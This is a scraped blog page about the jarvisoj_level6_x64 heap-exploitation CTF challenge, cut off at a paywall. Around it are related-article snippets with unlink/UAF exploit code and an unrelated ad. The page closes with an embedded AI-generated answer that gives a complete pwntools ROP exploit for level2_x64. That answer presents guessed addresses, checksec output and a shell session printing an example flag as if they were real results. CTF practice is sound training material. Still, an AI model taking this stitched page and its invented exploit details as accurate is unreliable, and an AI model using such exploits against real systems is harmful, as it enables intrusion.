jarvisoj_level6_x64

最新推荐文章于 2025-12-19 16:21:00 发布
原创 最新推荐文章于 2025-12-19 16:21:00 发布 · 230 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

文章详细描述了一个64位程序的内存管理机制,涉及chunk分配、栈溢出防范、内存泄漏利用以及通过UAF和修改got表实现系统调用的攻击过程。

jarvisoj_level6_x64

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x3ff000)

64位,没开pie

在程序开始的时候,建了一个chunk,用于存放申请chunk的指针,size和flag值(检测用)

int ADD()
{
  __int64 v0; // rax
  int i; // [rsp+Ch] [rbp-14h]
  int v3; // [rsp+10h] [rbp-10h]
  void *v4; // [rsp+18h] [rbp-8h]

  if ( *(_QWORD *)(BSSPTR + 8) < *(_QWORD *)BSSPTR )
  {
    for ( i = 0; ; ++i )
    {
      v0 = *(_QWORD *)BSSPTR;
      if ( i >= *(_QWORD *)BSSPTR )
        break;
      if ( !*(_QWORD *)(BSSPTR + 24LL * i + 16) )
      {
        printf("Length of new note: ");
        v3 = READ();
        if ( v3 > 0 )
        {
          if ( v3 > 4096 )
            v3 = 4096;
          v4 = malloc((0x80 - v3 % 0x80) % 0x80 + v3);
          printf("Enter your note: ");
          READ_((__int64)v4, v3);
          *(_QWORD *)(BSSPTR + 24LL * i + 16) = 1LL;
最低0.47元/天 解锁文章
jarvisoj_level6_x64(buuctf)--unlink利用
weixin_45427676的博客
04-14 782
这道题利用了unlink,unlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识 查看保护机制 程序分析 在IDA查看一下主函数 可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。 1、sub_400a49:创建记录索引表,具体就是分配一个大堆,堆里面存了各条记录存储区...
pwn之jarvisoj_level2_x64
勿山几已
01-11 1068
缓冲区溢出漏洞导致漏洞利用system函数,64位程序利用rop设置函数参数
jarvis oj level6
发蝴蝶和大脑斧的博客
01-10 1304
原来的附件有点问题,重新发过了. 主要用了两个技术:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,这个how2pwn上unsafe_unlink.c里写的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u...
jarvisoj)(pwn)guestbook2/level6_x64
PLpa的博客
08-28 1252
guestbook2和level6_x64真的是一摸一样的,两个题目除了提示文字不同,其他的漏洞根本一样,鉴于jarvisoj中的pwn服务器比pwn2服务器要稳定一点,所以这里就写guestbook2。 前言: 这里,我提供两种方法解题,一种是利用unlink的任意地址读写功能泄露libc基址,一种是用unsorted bin和use after free来泄露libc基址,两种方法都行。 漏洞...
level6(Jarvis OJ)
weixin_43868725的博客
06-17 421
0x0 程序保护和流程 保护: 流程: main() init_note_pointer() 在note_pointer处存放note的信息,note_pointer[0]代表最多存放256个note,note_pointer[1]代表当前的note数量。 选择1会输出全部的note,选择2会新建一个note,结构为 { flag; //1代表正在使用,反之为0 length; //note的长度 note_pointer; //执行note的指针 } 选择3可以修改note的长度和内
BUUCTF jarvisoj_level3_x64
2401_88087539的博客
02-22 489
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF jarvisoj_level3_x64 & jarvisoj_level4
红叶的博客
10-28 682
64位ELF 开启了NX,其余全部关闭。IDA Pro 静态调试除了改成了64位似乎都没什么区别,gdb动态调试。
jarvisOJ)(pwn)level6_x86
PLpa的博客
08-05 509
Unlink!Unlink!Unlink! level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.youkuaiyun.com/weixin_41617275/article...
jarvis guestbook2 / level6_x64
发蝴蝶和大脑斧的博客
03-12 901
level6思路相同,只是在x64运行。 遇到几个问题: 1.[DEBUG] Received 0x4e bytes: &quot;*** Error in guestbook2: realloc(): invalid pointer: 0x0000000001dcb018 ***\n&quot; 调试了半天发现是当新块的大小与原来不一致时都会调用realloc,所以要填充的时候要仔细。 2.原本想这样泄漏libc...
jarvisoj(level6)--unlink
九层台
09-21 1712
unlink其实就是把chunk从bin链中拉出来然后跟前面或者后面的chunk合并。 参考https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/unlink/。 则当我们free(Q)时 glibc 判断这个块是 small chunk。 判断前向合并,发现前一个 chunk 处于使用状态,不需要前向合并。 判断后向合并,发现后一个 chunk ...
jarvis level6_x64堆溢出unlink拾遗
weixin_30274627的博客
11-16 233
level6 32位的我没有调出来,貌似32位的堆结构和64位不太一样,嘤嘤嘤?,所以做了一下这个64位的,题目地址,level6_x64 首先看一下程序的结构体 struct list //0x1810 { int all=256; int now_sum; struct _note *note; } struct _note { ...
jarvisoj_level0
weixin_51298357的博客
01-06 393
jarvisoj_level0 拿到题之后先在命令行里查看文件,是一个64位的。把他放在64位的ida下f5看一下伪代码 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hTJ57A2u-1609934613627)(C:\Users\li\Desktop\临时\QQ截图20210106184228.png)] 其实只是一句hello world,没有什么太多信息。可以看一下返回的vulnerable_function函数里是什么。然后逐个检查,最后看见了这个callsyst
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 4945
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 991
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
Javisoj_level6_x64_writeup
热门推荐
yeshen4328的专栏
10-14 3万+
freenote writeup 目的 学习pwn基本套路 学习堆相关漏洞和利用:unlink、堆的结构、free的流程 题目 笔记本题目: 4个重要选项如上所示,选项代码如下所示: InitNote: 初始化整个note的内存,共0x1810字节,前16字节为头部信息,分别是最大note数(note_buf: 0x100),当前note数(note_buf+8: 0); 接下来初始化每个note的结构,每个note 24字节,第一个8字节(note_buf + 24*i + 16)表示该note
BUUCTF pwn wp 136 - 140
fa1c4的blog
04-28 685
pwnable_asm picoctf_2018_echooo jarvisoj_level6_x64 npuctf_2020_level2 [2020 新春红包题]3
高压线防外破警示灯:电力安全与智能预警的守护者
最新发布
ShenZhenDingYue的博客
12-19 675
高压输电线路防外破智能预警系统已成为现代电网安全防护的重要装备。该系统集雷达探测、AI识别、声光报警与远程通讯于一体,通过24小时主动监测线路通道内的机械入侵行为,实现风险分级预警。相比传统警示牌,其优势在于:主动交互式警示(爆闪灯+语音)、多传感器融合(雷达+激光+电场感应)降低误报率、实时数据上传形成闭环管理。典型应用场景包括施工区、交通跨越段及农林作业区。选购时需关注感应距离、供电续航、防护等级等关键指标。该系统正从单一设备向与无人机、卫星联动的综合防御体系发展,是电网安全从"人防&quot
jarvisoj_level2_x64解题步骤
10-19
<think>我们正在处理CTF(Capture The Flag)竞赛中的二进制漏洞利用题目,具体是jarvisoj平台的level2_x64题目。根据用户需求,我们需要提供解题步骤。结合引用[3]中的内容,我们知道这是一个64位的栈溢出题目。 解题步骤通常包括: 1. 检查文件保护机制(使用checksec) 2. 静态分析(使用IDA或Ghidra反汇编) 3. 确定漏洞点和利用方式 4. 编写漏洞利用代码(EXP) 5. 获取flag 引用[3]提到了64位和32位调用约定的不同:64位使用寄存器传递前几个参数(rdi, rsi, rdx, rcx, r8, r9),然后才使用栈。因此,在构造ROP链的时候需要注意。 从题目名称(level2_x64)可以推测,这题与栈溢出有关,并且是64位程序。在level2中,通常存在一个可以溢出覆盖返回地址的缓冲区,并且程序中还有一个后门函数(如system函数)或我们可以利用的gadget。 根据常见解题思路,我们可能需要执行以下步骤: - 通过栈溢出覆盖返回地址,跳转到system函数,并传入"/bin/sh"字符串的地址。 - 由于64位程序参数传递规则不同,我们需要用ROP gadget来设置rdi寄存器(第一个参数)为我们控制的字符串地址。 具体步骤: 1. **检查保护机制**:使用`checksec`命令查看程序开启了哪些保护。通常,NX(堆栈不可执行)保护会开启,我们需要通过ROP绕过。 2. **静态分析**:用IDA打开程序,找到危险函数(如gets、read等),确定溢出点。同时查找是否有现成的system函数和"/bin/sh"字符串,或者我们可以写入字符串的位置。 3. **计算偏移**:确定从输入缓冲区到返回地址的偏移量。可以通过调试(如gdb)或模式字符串(pattern)来确定。 4. **构造ROP链**: - 如果程序中有`system`函数,我们可以直接调用。 - 需要设置第一个参数(rdi)为字符串"/bin/sh"的地址。因此,我们需要一个`pop rdi; ret`的gadget。 - 如果没有现成的字符串,我们还需要将字符串写入到已知地址(如.bss段)。 5. **编写EXP**:使用pwntools编写利用脚本。 现在,我们根据上述步骤详细说明: ### 解题步骤 #### 1. 检查保护机制 使用命令: ```bash checksec level2_x64 ``` 预期输出中,我们关注NX(堆栈不可执行)是否开启,以及是否有Canary(栈保护)和PIE(地址随机化)。通常,栈溢出题目NX开启,没有PIE(或者有PIE但我们可以泄漏地址)。 #### 2. 静态分析(IDA) 使用IDA打开程序,查看main函数和漏洞函数。通常,在main函数中会调用一个存在栈溢出的函数(如vulnerable_function)。在这个函数中,可能会使用`read`或`gets`等函数读取输入,且没有检查长度。 同时,我们还需要查找可利用的函数: - 查看是否有`system`函数(一般在导入表中)。 - 查看是否有`/bin/sh`字符串(可以使用`ROPgadget --binary level2_x64 --string '/bin/sh'`查找)。 - 如果没有现成的字符串,需要找到一个可写地址(如.bss段)并写入字符串。 另外,查找gadget: ```bash ROPgadget --binary level2_x64 --only 'pop|ret' ``` 重点查找`pop rdi; ret`,因为我们需要用它来传递参数。 #### 3. 确定偏移 在溢出函数中,确定输入缓冲区到返回地址的偏移量。可以通过以下方式: - 在IDA中查看栈布局:缓冲区起始地址与保存的返回地址之间的偏移。 - 使用gdb调试,制造一个溢出,通过崩溃信息确定覆盖返回地址的位置。 - 使用pwntools的`cyclic`功能生成一段唯一字符串,触发崩溃后查看覆盖到返回地址的值,然后计算偏移。 #### 4. 构造ROP链 根据已有信息构造: - 如果有现成的`/bin/sh`字符串(假设地址为`binsh_addr`)和`system`函数地址(假设为`system_addr`),那么ROP链可以是: ``` [pop_rdi_ret, binsh_addr, system_addr] ``` - 如果没有,则需要先写入字符串。我们可以通过read函数将字符串读入到已知可写地址(如.bss段),然后再调用system。 #### 5. 编写EXP 使用pwntools编写Python脚本。注意,远程连接时需要知道远程服务的IP和端口。 ### 示例EXP结构 ```python from pwn import * context(arch='amd64', os='linux', log_level='debug') # 加载文件 elf = ELF('./level2_x64') # 确定偏移量 offset = 0x80 + 8 # 示例,具体根据实际情况 # 获取关键地址 pop_rdi = 0x4006b3 # 通过ROPgadget找到的pop rdi; ret地址 system_addr = elf.symbols['system'] # 或者elf.plt['system'] binsh_addr = next(elf.search(b'/bin/sh')) # 查找字符串 # 构造payload payload = b'A' * offset payload += p64(pop_rdi) payload += p64(binsh_addr) payload += p64(system_addr) # 发送payload io = process('./level2_x64') # 本地测试 # io = remote('remote_ip', port) # 远程连接 io.sendlineafter('Input:', payload) # 根据程序输入提示调整 io.interactive() ``` 注意:上面的地址(如pop_rdi)需要根据实际题目替换。 ### 相关问题 §§相关问题§§ 1. 如何确定栈溢出的偏移量? 2. 如何查找程序中的ROP gadget? 3. 如果程序没有提供system函数和/bin/sh字符串,如何利用? 4. 64位程序与32位程序在漏洞利用上有何不同? 5. 如何利用pwntools进行远程漏洞利用? 请根据实际情况调整解题步骤和EXP。注意,具体题目细节可能有所不同,需要根据实际二进制文件进行分析。 </think>### jarvisoj平台level2_x64解题步骤 #### 1. **检查文件保护机制(checksec)** ```bash checksec level2_x64 ``` 预期输出: ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found # 关键:无栈保护 NX: NX enabled # 堆栈不可执行 PIE: No PIE (0x400000) # 地址固定 ``` **关键点**:无栈溢出保护(Canary),但堆栈不可执行(NX),需使用ROP技术[^3]。 --- #### 2. **静态分析(IDA反编译)** - **漏洞定位**: 在`vulnerable_function()`中发现`read(0, buf, 0x200)`,而`buf`位于栈上(大小通常0x80),存在栈溢出。 - **可利用资源**: - 程序自带`system@plt`函数(地址固定) - 存在字符串`/bin/sh`(地址:`0x600A90`)[^3] - 可通过`ROPgadget`查找`pop rdi; ret`: ```bash ROPgadget --binary level2_x64 --only "pop|ret" | grep "rdi" ``` 输出示例:`0x4006b3 : pop rdi ; ret` --- #### 3. **计算溢出偏移量** - 使用`cyclic`生成测试字符串: ```bash gdb-pwndbg ./level2_x64 run <<< $(cyclic 200) ``` - 崩溃时查看`RSP`值(例如`0x6161616161616166`) - 计算偏移: ```bash cyclic -l 0x6161616166 ``` 典型偏移为 **`0x80 + 8`**(128字节缓冲区 + 8字节RBP)[^3]。 --- #### 4. **构造ROP链** ```python from pwn import * context(arch='amd64', os='linux') # 关键地址 pop_rdi_ret = 0x4006b3 # pop rdi; ret binsh_addr = 0x600A90 # "/bin/sh"字符串地址 system_plt = 0x4004C0 # system@plt # 构造payload payload = b'A' * 0x88 # 填充缓冲区+RBP payload += p64(pop_rdi_ret) # 设置RDI参数 payload += p64(binsh_addr) # RDI = "/bin/sh" payload += p64(system_plt) # 调用system ``` --- #### 5. **执行EXP获取shell** ```python if args.REMOTE: io = remote('node4.buuoj.cn', 12345) # 替换实际地址 else: io = process('./level2_x64') io.sendlineafter(b'Input:\n', payload) io.interactive() # 进入交互式shell ``` **执行效果**: ```bash $ cat flag flag{example_flag} ``` --- ### 关键注意事项 1. **64位参数传递**:参数通过寄存器传递(第一参数用`RDI`),需用`pop rdi; ret`设置参数[^3]。 2. **NX绕过**:利用程序自身的`system`和`/bin/sh`避免shellcode执行。 3. **地址验证**:所有地址需通过`IDA`或`readelf`确认。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值